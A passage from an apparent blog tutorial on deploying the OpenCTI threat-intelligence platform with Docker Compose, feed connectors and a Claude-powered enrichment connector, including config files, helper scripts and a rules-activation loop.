href="https://www.misp-project.org/feeds/?utm_source=chatgpt.com"><strong>MISP Default / CIRCL OSINT Feeds</strong></a> — Connector: <a href="https://github.com/OpenCTI-Platform/connectors/tree/master/external-import/misp-feed?utm_source=chatgpt.com">opencti/connector-misp-feed</a> — Data: STIX/MISP bundles, indicators, observables — Setup: Free.</li><li><a href="https://www.misp-project.org/feeds/?utm_source=chatgpt.com"><strong>CyberCrime-Tracker feed via MISP default feeds</strong></a> — Connector: use <a href="https://github.com/OpenCTI-Platform/connectors/tree/master/external-import/misp-feed?utm_source=chatgpt.com">opencti/connector-misp-feed</a> rather than a dedicated current connector — Data: C2 panels / freetext indicators — Setup: Free.</li><li><a href="https://openphish.com/?utm_source=chatgpt.com"><strong>OpenPhish</strong></a> — Connector: no verified current dedicated OpenCTI connector in the main repo; use generic feed ingestion where suitable — Data: Phishing URLs — Setup: Free/community feed options.</li><li><strong>DigitalSide IT-ISAC MISP Feed</strong> — Connector: <a href="https://github.com/OpenCTI-Platform/connectors/tree/master/external-import/misp-feed?utm_source=chatgpt.com">opencti/connector-misp-feed</a> with custom MISP_FEED_URL — Data: IOCs / MISP-format feed — Setup: Free.</li></ul><h4>4.2 Commercial Feeds (require license/API key)</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*dMgCc4cuy0X9LxEAcR0PiQ.png"></figure><ul><li><a href="https://www.misp-project.org/"><strong>MISP — self-hosted</strong></a> — Connector: opencti/connector-misp — Strengths: community sharing, custom events, internal/private CTI exchange. The OpenCTI repo lists both misp and misp-feed; use misp for a live MISP instance with API access, and misp-feed for static MISP feed URLs.</li><li><a href="https://www.virustotal.com/"><strong>VirusTotal / Google Threat Intelligence</strong></a> — Connector: opencti/connector-virustotal — Strengths: file, URL, domain, and IP enrichment. The connector is under internal-enrichment, not external-import.</li><li><strong>Mandiant Threat Intelligence / Google Threat Intelligence</strong> — Connector: opencti/connector-mandiant — Strengths: APT intelligence, actor reporting, malware/campaign context.</li><li><a href="https://www.recordedfuture.com/"><strong>Recorded Future</strong></a> — Connectors: opencti/connector-recordedfuture and opencti/connector-recordedfuture-enrichment — Strengths: risk lists, enrichment, vulnerability/contextual intelligence, dark web and external threat data. Recorded Future documentation describes the OpenCTI integration as two components: an enrichment connector and a Recorded Future connector.</li><li><a href="https://www.crowdstrike.com/products/threat-intelligence/"><strong>CrowdStrike Falcon Intelligence</strong></a> — Connector: opencti/connector-crowdstrike — Strengths: actor tracking, indicators, adversary intelligence, Falcon ecosystem context.</li><li><a href="https://www.sekoia.io/"><strong>Sekoia.io Intelligence</strong></a> — Connector: opencti/connector-sekoia — Strengths: European threat landscape, CTI feed ingestion, actor/campaign context. Sekoia’s own documentation points to the OpenCTI GitHub connector path.</li><li><a href="https://threatconnect.com/"><strong>ThreatConnect</strong></a> — Connector: <strong>no verified current dedicated connector in the main OpenCTI connector tree</strong> — Strengths: enterprise TI management, source aggregation, workflow and case management. I found an OpenCTI GitHub label/feature reference for “threat connect,” but not a confirmed current connector folder equivalent to external-import/threatconnect.</li><li><a href="https://intel471.com/"><strong>Intel 471</strong></a> — Connectors: opencti/connector-intel471, opencti/connector-intel471-darknet, and opencti/connector-intel471_v2 — Strengths: underground forums, cybercrime actors, malware, infrastructure, dark web intelligence.</li></ul><h4>4.3 ISAC / Government Feeds</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*dtrgjORW-h5AoEi0rOMBHw.png"></figure><ul><li><a href="https://www.cisa.gov/resources-tools/services/automated-indicator-sharing-ais-service?utm_source=chatgpt.com"><strong>CISA Automated Indicator Sharing / AIS</strong></a> — Method: TAXII/STIX client, AIS 2.0 uses TAXII 2.1 — Access: free service for eligible participants; contact CISA to onboard.</li><li><a href="https://www.fsisac.com/?utm_source=chatgpt.com"><strong>FS-ISAC</strong></a> — Method: STIX/TAXII and MISP automated feeds — Access: financial-sector membership; automated-feed credentials/licensing must be explicitly requested.</li><li><a href="https://health-isac.org/"><strong>Health-ISAC / H-ISAC</strong></a> — Method: HITS indicator-sharing feed; STIX/TAXII-compatible threat intelligence sharing — Access: healthcare-sector membership / Health-ISAC member access.</li><li><a href="https://www.misp-project.org/communities/?utm_source=chatgpt.com"><strong>NATO MISP Community</strong></a> — Method: MISP community / MISP sync — Access: official government cyber-defense entities from NATO nations, sponsored by their national representative in the NATO Multinational MISP Steering Board.</li><li><a href="https://www.enisa.europa.eu/topics/cyber-threats/threat-landscape?utm_source=chatgpt.com"><strong>ENISA Threat Landscape</strong></a> — Method: public reports and CTI publications; not a confirmed public TAXII/STIX feed. ENISA’s CTL methodology references STIX 2.1 as a common CTI representation format, but this is different from offering a public feed endpoint.</li></ul><h4>4.4 Feed Priority and TLP Assignment</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*XhNw0PBdOVuwb9zHT37S5Q.png"></figure><pre># Recommended TLP assignment by source<br>feeds:<br>  - source: mitre_attack<br>    tlp: WHITE          # public, shareable<br>    confidence: 90<br>  - source: alienvault_otx<br>    tlp: GREEN          # community sharing<br>    confidence: 60<br>  - source: mandiant<br>    tlp: AMBER          # restricted to org<br>    confidence: 85<br>  - source: internal_soc<br>    tlp: RED            # internal only<br>    confidence: 95</pre><h3>5. AI Integration Layer</h3><p>This is the “AI-driven” layer on top of standard OpenCTI — a custom connector and MCP server that adds:</p><h4>5.1 AI Enrichment Connector (Claude API)</h4><ul><li>On every new Report, Malware, or Threat-Actor ingested → call Claude API</li><li>Extract structured STIX entities from unstructured text (PDFs, blog posts)</li><li>Summarize long reports into 3-sentence executive briefs</li><li>Score indicator relevance against your organization’s sector profile</li><li>Suggest ATT&amp;CK technique mappings from narrative descriptions</li></ul><h4>5.2 AI Pipeline Architecture</h4><pre>New Report ingested<br>        │<br>        ▼<br>[AI Enrichment Connector]<br>        │<br>        ├─► Claude API: Extract entities → creates STIX SDOs<br>        ├─► Claude API: Map to ATT&amp;CK techniques<br>        ├─► Claude API: Generate executive summary<br>        └─► Claude API: Score severity for your sector<br>                │<br>                ▼<br>        Update Report in OpenCTI<br>        (summary, related entities, confidence scores)</pre><h3>6. Prerequisites</h3><h4>6.1 Hardware (minimum production)</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Ics48TK_7nXqH-diy8Uzng.png"></figure><h4>6.2 Software</h4><pre># Install Docker Engine (Ubuntu 22.04)<br>sudo apt-get update<br>sudo apt-get install -y ca-certificates curl gnupg lsb-release<br>sudo install -m 0755 -d /etc/apt/keyrings<br>curl -fsSL https://download.docker.com/linux/ubuntu/gpg | \<br>  sudo gpg --dearmor -o /etc/apt/keyrings/docker.gpg<br>sudo chmod a+r /etc/apt/keyrings/docker.gpg<br>echo "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.gpg] \<br>  https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" | \<br>  sudo tee /etc/apt/sources.list.d/docker.list &gt; /dev/null<br>sudo apt-get update<br>sudo apt-get install -y docker-ce docker-ce-cli containerd.io docker-compose-plugin<br># Add user to docker group<br>sudo usermod -aG docker $USER<br>newgrp docker<br># Verify<br>docker compose version</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/698/1*eM3O8rdQsyvwxf-0WEZX8w.png"></figure><h4>6.3 System Tuning (required for ElasticSearch)</h4><pre># ElasticSearch requires high vm.max_map_count<br>sudo sysctl -w vm.max_map_count=1048575<br>echo "vm.max_map_count=1048575" | sudo tee -a /etc/sysctl.conf<br><br># Increase file descriptor limits<br>echo "* soft nofile 65536" | sudo tee -a /etc/security/limits.conf<br>echo "* hard nofile 65536" | sudo tee -a /etc/security/limits.conf</pre><h3>7. Docker Compose Deployment</h3><h4><strong>7.0 Deploy from GitHub (recommended)</strong></h4><p>The fastest deployment path is to clone the maintained project repository and create a local `.env` from the sanitized template:</p><pre>cd /home/andrey<br>git clone https://github.com/anpa1200/opencti-intelligent-shield.git openCTI<br>cd /home/andrey/openCTI<br># Create local secrets/config. This file is ignored by Git.<br>cp .env.example .env<br>nano .env<br># Start the full stack after filling in .env<br>./scripts/start-all.sh</pre><p>This gives you the Docker Compose files, OpenCTI patches, AI enrichment connector, helper scripts, and Docusaurus documentation in one checkout. Use the manual sections below if you want to recreate the files by hand or compare the generated content.</p><h4>7.1 Directory Structure</h4><pre>/home/andrey/openCTI/<br>├── .env                          # secrets and config<br>├── docker-compose.yml            # core stack<br>├── docker-compose.connectors.yml # feed connectors<br>├── docker-compose.ai.yml         # AI enrichment connector<br>├── patches/<br>│   └── back.js                   # ILM race condition fix (ES 8.13 + OpenCTI 6.2.0)<br>└── connectors/<br>    └── ai-enrichment/            # custom AI connector source</pre><h4>7.2 Environment File</h4><pre>cat &gt; /home/andrey/openCTI/.env &lt;&lt; 'EOF'<br># === Core ===<br>OPENCTI_ADMIN_EMAIL=admin@opencti.local<br>OPENCTI_ADMIN_PASSWORD=CHANGE_ME_STRONG_PASSWORD<br>OPENCTI_ADMIN_TOKEN=CHANGE_ME_UUID4_TOKEN<br>OPENCTI_BASE_URL=http://localhost:8080<br><br># === Secrets ===<br>APP__ADMIN__TOKEN=CHANGE_ME_UUID4_TOKEN<br>APP__SECRET_KEY=CHANGE_ME_SECRET<br><br># === ElasticSearch ===<br># NOTE: key is ELASTIC_PASSWORD, not ELASTIC_AUTH<br>ELASTIC_PASSWORD=CHANGE_ME_ELASTIC_PASS<br><br># === Redis ===<br>REDIS_PASSWORD=opencti<br><br># === MinIO ===<br>MINIO_ROOT_USER=opencti<br>MINIO_ROOT_PASSWORD=CHANGE_ME_MINIO_PASS<br><br># === RabbitMQ ===<br>RABBITMQ_DEFAULT_USER=opencti<br>RABBITMQ_DEFAULT_PASS=CHANGE_ME_RABBITMQ_PASS<br><br># === Connector IDs (unique UUID4 per connector — NOT used for auth) ===<br>CONNECTOR_MITRE_TOKEN=CHANGE_ME_UUID4<br>CONNECTOR_CVE_TOKEN=CHANGE_ME_UUID4<br>CONNECTOR_ALIENVAULT_TOKEN=CHANGE_ME_UUID4<br>CONNECTOR_ABUSE_SSL_TOKEN=CHANGE_ME_UUID4<br>CONNECTOR_URLHAUS_TOKEN=CHANGE_ME_UUID4<br>CONNECTOR_AI_ENRICHMENT_TOKEN=CHANGE_ME_UUID4<br><br># === External API keys ===<br>ALIENVAULT_API_KEY=your_otx_key_here<br>NVD_API_KEY=your_nvd_api_key_here     # UUID format from nvd.nist.gov/developers/request-an-api-key<br>ANTHROPIC_API_KEY=your_claude_api_key_here<br>EOF<br><br># Generate unique UUIDs for connector IDs<br>python3 -c "import uuid; [print(uuid.uuid4()) for _ in range(8)]"# Generate proper tokens<br>python3 -c "import uuid; [print(f'Token: {uuid.uuid4()}') for _ in range(10)]"</pre><h4>7.3 Core Stack — docker-compose.yml</h4><pre>nano docker-compose.yml</pre><pre>version: "3"<br>services:<br>  redis:<br>    image: redis:7.2<br>    restart: always<br>    volumes:<br>      - redisdata:/data<br>    command: redis-server --requirepass ${REDIS_PASSWORD:-opencti}<br>  elasticsearch:<br>    image: docker.elastic.co/elasticsearch/elasticsearch:8.13.0<br>    volumes:<br>      - esdata:/usr/share/elasticsearch/data<br>    environment:<br>      - discovery.type=single-node<br>      - xpack.ml.enabled=false<br>      - xpack.security.enabled=true<br>      - ELASTIC_PASSWORD=${ELASTIC_PASSWORD:-CHANGE_ME}<br>      - "ES_JAVA_OPTS=-Xms2g -Xmx2g"<br>      - cluster.routing.allocation.disk.threshold_enabled=false<br>    ulimits:<br>      memlock:<br>        soft: -1<br>        hard: -1<br>    restart: always<br>  minio:<br>    image: minio/minio:RELEASE.2024-01-16T16-07-38Z<br>    volumes:<br>      - miniodata:/data<br>    ports:<br>      - "9001:9001"   # console<br>    environment:<br>      MINIO_ROOT_USER: ${MINIO_ROOT_USER:-opencti}<br>      MINIO_ROOT_PASSWORD: ${MINIO_ROOT_PASSWORD:-CHANGE_ME}<br>    command: server /data --console-address ":9001"<br>    restart: always<br>  rabbitmq:<br>    image: rabbitmq:3.13-management<br>    environment:<br>      RABBITMQ_DEFAULT_USER: ${RABBITMQ_DEFAULT_USER:-opencti}<br>      RABBITMQ_DEFAULT_PASS: ${RABBITMQ_DEFAULT_PASS:-CHANGE_ME}<br>      RABBITMQ_NODENAME: rabbit01@localhost<br>    volumes:<br>      - rabbitmqdata:/var/lib/rabbitmq<br>    restart: always<br>  opencti:<br>    image: opencti/platform:6.2.0<br>    environment:<br>      NODE_OPTIONS: --max-old-space-size=8096<br>      APP__PORT: 8080<br>      APP__BASE_URL: ${OPENCTI_BASE_URL:-http://localhost:8080}<br>      APP__ADMIN__EMAIL: ${OPENCTI_ADMIN_EMAIL}<br>      APP__ADMIN__PASSWORD: ${OPENCTI_ADMIN_PASSWORD}<br>      APP__ADMIN__TOKEN: ${OPENCTI_ADMIN_TOKEN}<br>      APP__APP_LOGS__LOGS_LEVEL: error<br>      REDIS__HOSTNAME: redis<br>      REDIS__PORT: 6379<br>      REDIS__USE_SSL: "false"<br>      REDIS__PASSWORD: ${REDIS_PASSWORD:-opencti}<br>      ELASTICSEARCH__URL: http://elasticsearch:9200<br>      ELASTICSEARCH__USERNAME: elastic<br>      ELASTICSEARCH__PASSWORD: ${ELASTIC_PASSWORD:-CHANGE_ME}<br>      MINIO__ENDPOINT: minio<br>      MINIO__PORT: 9000<br>      MINIO__USE_SSL: "false"<br>      MINIO__ACCESS_KEY: ${MINIO_ROOT_USER:-opencti}<br>      MINIO__SECRET_KEY: ${MINIO_ROOT_PASSWORD:-CHANGE_ME}<br>      RABBITMQ__HOSTNAME: rabbitmq<br>      RABBITMQ__PORT: 5672<br>      RABBITMQ__USERNAME: ${RABBITMQ_DEFAULT_USER:-opencti}<br>      RABBITMQ__PASSWORD: ${RABBITMQ_DEFAULT_PASS:-CHANGE_ME}<br>      SMTP__HOSTNAME: localhost<br>      PROVIDERS__LOCAL__STRATEGY: LocalStrategy<br>    volumes:<br>      - ./patches/back.js:/opt/opencti/build/back.js:ro<br>    ports:<br>      - "8080:8080"<br>    depends_on:<br>      - redis<br>      - elasticsearch<br>      - minio<br>      - rabbitmq<br>    restart: always<br>  worker:<br>    image: opencti/worker:6.2.0<br>    environment:<br>      OPENCTI_URL: http://opencti:8080<br>      OPENCTI_TOKEN: ${OPENCTI_ADMIN_TOKEN}<br>      WORKER_LOG_LEVEL: error<br>    depends_on:<br>      - opencti<br>    deploy:<br>      mode: replicated<br>      replicas: 3<br>    restart: always<br>volumes:<br>  esdata:<br>  redisdata:<br>  miniodata:<br>  rabbitmqdata:<br>networks:<br>  default:<br>    name: opencti_network<br>    external: true</pre><h4>7.4 Connectors — docker-compose.connectors.yml</h4><pre>nano docker-compose.connectors.yml</pre><pre>version: "3"<br>services:<br>  # MITRE ATT&amp;CK (no API key needed)<br>  connector-mitre:<br>    image: opencti/connector-mitre:6.2.0<br>    environment:<br>      OPENCTI_URL: http://opencti:8080<br>      OPENCTI_TOKEN: ${OPENCTI_ADMIN_TOKEN}<br>      CONNECTOR_ID: ${CONNECTOR_MITRE_TOKEN}<br>      CONNECTOR_NAME: "MITRE ATT&amp;CK"<br>      CONNECTOR_SCOPE: "marking-definition,identity,attack-pattern,course-of-action,intrusion-set,campaign,malware,tool,vulnerability,x-mitre-matrix,x-mitre-tactic,x-mitre-collection"<br>      CONNECTOR_CONFIDENCE_LEVEL: 75<br>      CONNECTOR_UPDATE_EXISTING_DATA: "true"<br>      CONNECTOR_LOG_LEVEL: error<br>      MITRE_REMOVE_STATEMENT_MARKING: "true"<br>      MITRE_INTERVAL: 7  # days between full refresh<br>    restart: always<br>  # CVE / NVD Vulnerabilities<br>  connector-cve:<br>    image: opencti/connector-cve:6.2.0<br>    volumes:<br>      - ./patches/cve/api.py:/opt/opencti-connector-cve/services/client/api.py:ro<br>      - ./patches/cve/vulnerability.py:/opt/opencti-connector-cve/services/client/vulnerability.py:ro<br>    environment:<br>      OPENCTI_URL: http://opencti:8080<br>      OPENCTI_TOKEN: ${OPENCTI_ADMIN_TOKEN}<br>      CONNECTOR_ID: ${CONNECTOR_CVE_TOKEN}<br>      CONNECTOR_NAME: "Common Vulnerabilities and Exposures"<br>      CONNECTOR_SCOPE: "identity,vulnerability"<br>      CONNECTOR_CONFIDENCE_LEVEL: 75<br>      CONNECTOR_LOG_LEVEL: info<br>      CONNECTOR_UPDATE_EXISTING_DATA: "true"<br>      CVE_BASE_URL: "https://services.nvd.nist.gov/rest/json/cves"<br>      CVE_API_KEY: ${NVD_API_KEY}<br>      CVE_MAX_DATE_RANGE: 120<br>      CVE_MAINTAIN_DATA: "true"<br>      CVE_INTERVAL: 2<br>    restart: always<br>  # AlienVault OTX<br>  connector-alienvault:<br>    image: opencti/connector-alienvault:6.2.0<br>    environment:<br>      OPENCTI_URL: http://opencti:8080<br>      OPENCTI_TOKEN: ${OPENCTI_ADMIN_TOKEN}<br>      CONNECTOR_ID: ${CONNECTOR_ALIENVAULT_TOKEN}<br>      CONNECTOR_NAME: "AlienVault OTX"<br>      CONNECTOR_SCOPE: "stix-core-object"<br>      CONNECTOR_CONFIDENCE_LEVEL: 40<br>      CONNECTOR_LOG_LEVEL: error<br>      ALIENVAULT_BASE_URL: "https://otx.alienvault.com"<br>      ALIENVAULT_API_KEY: ${ALIENVAULT_API_KEY}<br>      ALIENVAULT_TLP: "White"<br>      ALIENVAULT_CREATE_OBSERVABLES: "true"<br>      ALIENVAULT_CREATE_INDICATORS: "true"<br>      ALIENVAULT_PULSE_START_TIMESTAMP: "2020-01-01T00:00:00"<br>      ALIENVAULT_REPORT_STATUS: "New"<br>      ALIENVAULT_REPORT_TYPE: "threat-report"<br>      ALIENVAULT_GUESS_MALWARE: "false"<br>      ALIENVAULT_GUESS_CVE: "false"<br>      ALIENVAULT_INTERVAL: 30   # minutes<br>    restart: always<br>  # Abuse.ch SSL Blacklist<br>  connector-abuse-ssl:<br>    image: opencti/connector-abuse-ssl:6.2.0<br>    environment:<br>      OPENCTI_URL: http://opencti:8080<br>      OPENCTI_TOKEN: ${OPENCTI_ADMIN_TOKEN}<br>      CONNECTOR_ID: ${CONNECTOR_MALWAREBAZAAR_TOKEN}<br>      CONNECTOR_NAME: "Abuse.ch SSL Blacklist"<br>      CONNECTOR_SCOPE: "stix-core-object"<br>      CONNECTOR_CONFIDENCE_LEVEL: 50<br>      CONNECTOR_LOG_LEVEL: error<br>      ABUSE_SSL_URL: "https://sslbl.abuse.ch/blacklist/sslblacklist.csv"<br>      ABUSE_SSL_INTERVAL: 30  # minutes<br>    restart: always<br>  # Abuse.ch URLhaus<br>  connector-urlhaus:<br>    image: opencti/connector-urlhaus:6.2.0<br>    environment:<br>      OPENCTI_URL: http://opencti:8080<br>      OPENCTI_TOKEN: ${OPENCTI_ADMIN_TOKEN}<br>      CONNECTOR_ID: ${CONNECTOR_URLHAUS_TOKEN}<br>      CONNECTOR_NAME: "Abuse.ch URLhaus"<br>      CONNECTOR_SCOPE: "stix-core-object"<br>      CONNECTOR_CONFIDENCE_LEVEL: 40<br>      CONNECTOR_LOG_LEVEL: error<br>      URLHAUS_CSV_URL: "https://urlhaus.abuse.ch/downloads/csv_recent/"<br>      URLHAUS_IMPORT_OFFLINE: "true"<br>      URLHAUS_INTERVAL: 2  # hours<br>    restart: always<br>  connector-threatfox:<br>    image: opencti/connector-threatfox:6.2.0<br>    environment:<br>      OPENCTI_URL: http://opencti:8080<br>      OPENCTI_TOKEN: ${OPENCTI_ADMIN_TOKEN}<br>      CONNECTOR_ID: ${CONNECTOR_THREATFOX_TOKEN}<br>      CONNECTOR_NAME: "ThreatFox"<br>      CONNECTOR_SCOPE: "stix-core-object"<br>      CONNECTOR_CONFIDENCE_LEVEL: 40<br>      CONNECTOR_LOG_LEVEL: error<br>      THREATFOX_API_URL: "https://threatfox-api.abuse.ch/api/v1/"<br>      THREATFOX_CREATE_INDICATORS: "true"<br>      THREATFOX_CREATE_OBSERVABLES: "true"<br>      THREATFOX_INTERVAL: 3<br>    restart: always<br>  connector-import-document:<br>    image: opencti/connector-import-document:6.2.0<br>    environment:<br>      OPENCTI_URL: http://opencti:8080<br>      OPENCTI_TOKEN: ${OPENCTI_ADMIN_TOKEN}<br>      CONNECTOR_ID: ${CONNECTOR_IMPORT_DOCUMENT_TOKEN}<br>      CONNECTOR_NAME: "ImportDocument"<br>      CONNECTOR_SCOPE: "application/pdf,text/plain,text/html"<br>      CONNECTOR_AUTO: "true"<br>      CONNECTOR_CONFIDENCE_LEVEL: 75<br>      CONNECTOR_LOG_LEVEL: error<br>    restart: always<br>networks:<br>  default:<br>    name: opencti_network<br>    external: true</pre><h4>7.5 AI Enrichment Connector — docker-compose.ai.yml</h4><pre>nano docker-compose.ai.yml</pre><pre>version: "3"<br><br>services:<br>  connector-ai-enrichment:<br>    build:<br>      context: ./connectors/ai-enrichment<br>      dockerfile: Dockerfile<br>    environment:<br>      OPENCTI_URL: http://opencti:8080<br>      OPENCTI_TOKEN: ${OPENCTI_ADMIN_TOKEN}<br>      CONNECTOR_ID: ${CONNECTOR_AI_ENRICHMENT_TOKEN}<br>      CONNECTOR_NAME: "AI Enrichment (Claude)"<br>      CONNECTOR_LOG_LEVEL: info<br>      ANTHROPIC_API_KEY: ${ANTHROPIC_API_KEY}<br>      AI_MODEL: claude-opus-4-7<br>      AI_ENRICHMENT_REPORTS: "true"<br>      AI_ENRICHMENT_MALWARE: "true"<br>      AI_ENRICHMENT_THREAT_ACTORS: "true"<br>    restart: always<br><br>networks:<br>  default:<br>    name: opencti_network<br>    external: true</pre><h3>8. Connector Configuration</h3><h4>Fast Start / Stop Scripts</h4><p>The repository includes two helper scripts for daily operations:</p><pre># Start core OpenCTI, wait for the UI/API, then start connectors and AI enrichment<br>./scripts/start-all.sh<br># Stop AI enrichment, connectors, and core OpenCTI while preserving Docker volumes<br>./scripts/stop-all.sh</pre><p>Use these scripts for normal start/stop operations after .env is configured. Use the manual commands below when debugging a specific service startup problem.</p><pre>nano start-all.sh</pre><pre>#!/usr/bin/env bash<br>set -euo pipefail<br><br>ROOT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")/.." &amp;&amp; pwd)"<br>cd "$ROOT_DIR"<br><br>WAIT_TIMEOUT="${WAIT_TIMEOUT:-300}"<br><br>wait_for_opencti() {<br>  local deadline=$((SECONDS + WAIT_TIMEOUT))<br><br>  echo "[start] Waiting for OpenCTI API on http://localhost:8080..."<br>  until curl -fsS http://localhost:8080 &gt;/dev/null 2&gt;&amp;1; do<br>    if (( SECONDS &gt;= deadline )); then<br>      echo "[start] OpenCTI did not become reachable within ${WAIT_TIMEOUT}s." &gt;&amp;2<br>      echo "[start] Check logs with: docker compose logs -f opencti" &gt;&amp;2<br>      return 1<br>    fi<br>    sleep 5<br>  done<br>}<br><br>echo "[start] Starting OpenCTI core stack..."<br>docker compose -f docker-compose.yml up -d<br><br>wait_for_opencti<br><br>echo "[start] Starting external connectors..."<br>docker compose -f docker-compose.connectors.yml up -d<br><br>echo "[start] Building and starting AI enrichment connector..."<br>docker compose -f docker-compose.ai.yml up -d --build<br><br>echo "[start] Done."<br>docker compose -f docker-compose.yml ps</pre><pre>nano stop-all.sh</pre><pre>#!/usr/bin/env bash<br>set -euo pipefail<br><br>ROOT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")/.." &amp;&amp; pwd)"<br>cd "$ROOT_DIR"<br><br>echo "[stop] Stopping OpenCTI core, connectors, and AI enrichment..."<br>docker compose \<br>  -f docker-compose.yml \<br>  -f docker-compose.connectors.yml \<br>  -f docker-compose.ai.yml \<br>  down --remove-orphans<br><br>echo "[stop] Done. Volumes are preserved."</pre><h4>8.1 Start the Core Stack</h4><pre>cd /home/andrey/openCTI<br><br># Pre-flight: ElasticSearch refuses allocation above 90% disk usage<br>df -h /var/lib/docker<br># If &gt; 90% full, run: docker system prune -a   (frees ~47 GB of unused images)<br><br># Create the shared Docker network (idempotent — safe to re-run)<br>docker network create opencti_network 2&gt;/dev/null || true<br><br># Start core services<br>docker compose -f docker-compose.yml up -d<br><br># Wait for ElasticSearch to be healthy before OpenCTI finishes initializing<br>until curl -s -u "elastic:${ELASTIC_PASSWORD}" \<br>  http://localhost:9200/_cluster/health | grep -q '"status":"green"\|"status":"yellow"'; do<br>  echo "Waiting for ES..."; sleep 5<br>done<br><br># Watch logs — first-run index creation takes 5-10 minutes<br># Look for "Listening on port 8080"<br>docker compose -f docker-compose.yml logs -f opencti | grep -E "Listening|ERROR|indices"</pre><h4>8.2 Start Connectors</h4><pre># Start feed connectors (after OpenCTI is healthy)<br>docker compose -f docker-compose.connectors.yml up -d<br># Verify connectors registered (wait ~60s for startup)<br>docker compose -f docker-compose.connectors.yml ps</pre><h4>8.3 Verify in UI</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*bgDghte5c5Hd2tKbutvP8A.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*fIQLlAGqYjzNesmSnRw2QQ.png"></figure><pre>http://localhost:8080<br>Login: admin@opencti.local / &lt;your password&gt;Navigation:<br>  Data → Connectors → check all show status "connected"<br>  Knowledge → Malwares → should start populating within minutes<br>  Activities → Logs → watch ingest events</pre><h3>9. AI-Driven Enrichment Pipeline</h3><h4>Overview</h4><p>The AI enrichment pipeline adds a Claude-powered layer on top of the standard OpenCTI ingestion flow. Every time a connector (AlienVault, MITRE, URLhaus, etc.) writes a new object into OpenCTI, an event is published to RabbitMQ. The AI connector subscribes to that event stream, calls the Claude API with the object’s content, and writes the extracted structured intelligence back into the graph as STIX relationships, notes, and entity updates — all automatically.</p><p><strong>Without AI enrichment:</strong></p><pre>AlienVault pulse → Report object in OpenCTI<br>                   (raw text, no relationships, no ATT&amp;CK mapping)</pre><p><strong>With AI enrichment:</strong></p><pre>AlienVault pulse → Report object in OpenCTI<br>                       ↓ AI connector picks it up from event stream<br>                   Claude API: extract entities, map techniques, score severity<br>                       ↓<br>                   Report now has:<br>                   ├── Note: executive summary (2-3 sentences)<br>                   ├── Relationship → ThreatActor (if found in graph)<br>                   ├── Relationship → Malware (if found in graph)<br>                   ├── Relationship → AttackPattern T1059.001 (created if missing)<br>                   └── x_opencti_score updated based on AI confidence</pre><h4>9.1 How the Event Stream Works</h4><p>OpenCTI uses RabbitMQ as its internal message bus. Every write operation (create, update, delete) on any STIX object publishes a message to a topic exchange. Connectors subscribe to this exchange via pycti's OpenCTIConnectorHelper.listen() method.</p><pre>OpenCTI platform<br>      │<br>      │ write event (STIX bundle)<br>      ▼<br>  RabbitMQ<br>  exchange: amq.topic<br>      │<br>      ├──► worker-1 (standard workers — write to ES/graph)<br>      ├──► worker-2<br>      ├──► worker-3<br>      └──► connector-ai-enrichment  ← our connector subscribes here<br>                  │<br>                  │ reads event payload:<br>                  │ {<br>                  │   "type": "create",<br>                  │   "data": { "id": "report--uuid", "type": "report", ... }<br>                  │ }<br>                  ▼<br>            calls Claude API<br>                  ▼<br>            writes enrichment back via GraphQL API</pre><p>Each message contains the full STIX object that was just created. The connector processes it and acknowledges the message — if it crashes mid-processing, RabbitMQ redelivers it.</p><p><strong>Connector type </strong><strong>INTERNAL_ENRICHMENT</strong> means:</p><ul><li>It does not import data on a schedule</li><li>It reacts to existing objects as they are created or updated</li><li>It appears in Settings → Connectors → Enrichment in the UI</li></ul><h4>9.2 Rules Engine (CE Automation)</h4><p><strong>Note:</strong> Playbooks are an Enterprise Edition feature. The Community Edition uses the built-in Rules Engine, which automatically infers and propagates relationships as data arrives.</p><p>All 20 rules are enabled. To verify or toggle: <strong>Settings → Customization → Rules</strong></p><p>To enable all rules via API (already done — included for re-initialization):</p><pre>RULES="attribution_attribution attribution_targets indicate_sighted attribution_use \<br>localization_of_targets location_location location_targets participate-to_parts \<br>observable_related observe_sighting part_part part-of_targets sighting_incident \<br>sighting_observable sighting_indicator report_ref_identity_part_of \<br>report_ref_indicator_based_on report_ref_observable_based_on \<br>report_ref_location_located_at parent_technique_use"<br>TOKEN=$(grep OPENCTI_ADMIN_TOKEN /home/andrey/openCTI/.env | cut -d= -f2)<br>for rule in $RULES; do<br>  curl -s -X POST http://localhost:8080/graphql \<br>    -H "Authorization: Bearer $TOKEN" \<br>    -H "Content-Type: application/json" \<br>    -d "{\"query\":\"mutation { ruleSetActivation(id: \\\"$rule\\\", enable: true) { id activated } }\"}" \<br>    | python3 -c "import sys,json; d=json.load(sys.stdin); print('$rule:', d['data']['ruleSetActivation']['activated'])"<br>done</pre><p><strong>What these rules do automatically once data arrives:</strong></p><p>RuleEffectattribution_attributionIf APT-X is attributed to Country-A, and APT-Y is a sub-group of APT-X → APT-Y also attributed to Country-Asighting_incidentIf an indicator is sighted, automatically raise an Incidentindicate_sightedIf indicator is sighted → infer the targeted entity from the indicator's relationshipreport_ref_indicator_based_onIf a Report references Observable X, and X has an Indicator → auto-link the Indicator to the Reportobservable_relatedIf two objects share a common Observable → infer a related-to relationshipparent_technique_useIf a sub-technique (T1059.001) is used → auto-link parent technique (T1059) as used</p><p><strong>For custom event-driven automation in CE</strong>, use a pycti script or the AI connector (section 9.1). The pycti library supports streaming the live event feed via helper.listen() — the AI connector in 9.1 uses exactly this pattern.10. Post-Deployment Hardening</p><h4>9.2 What Claude Extracts and How It Maps to STIX</h4><p>The connector sends the report’s description text to Claude with a structured prompt. Claude returns JSON. The connector then maps each field to STIX operations:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*f1BfkVeUO3Qlt9Kj6-MkFg.png"></figure><p>Claude output fieldSTIX actionsummaryCreates a Note object attached to the report (object_refs)threat_actors[]Looks up ThreatActor by name in graph → creates related-to relationship to reportmalware_families[]Looks up Malware by name → creates related-to relationship to reportattack_techniques[]Looks up AttackPattern by 